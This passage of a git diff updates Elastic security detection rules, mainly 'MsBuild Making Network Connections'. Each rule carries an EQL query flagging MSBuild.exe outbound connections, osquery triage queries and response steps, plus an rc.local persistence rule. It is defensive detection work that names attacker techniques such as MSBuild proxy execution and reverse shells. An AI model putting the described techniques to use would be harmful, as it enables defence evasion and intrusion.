that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json index f1e0722f753..876135cbd30 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "MsBuild Making Network Connections", - "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json index 08983ffede1..ae762245268 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "MsBuild Making Network Connections", - "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_106.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_106.json new file mode 100644 index 00000000000..bd1505e70d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_106.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies MsBuild.exe making outbound network connections. This may indicate adversarial activity as MsBuild is often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MsBuild Making Network Connections", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\", \"localhost\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0e79980b-4250-4a50-a509-69294c14e84b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "0e79980b-4250-4a50-a509-69294c14e84b_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json index b2c8055a0a7..c3784a6da73 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json index 7fc0b7da10b..0acd69d4459 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json index 109fe689b13..135931a0e24 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json @@ -17,7 +17,7 @@ "host.id", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name 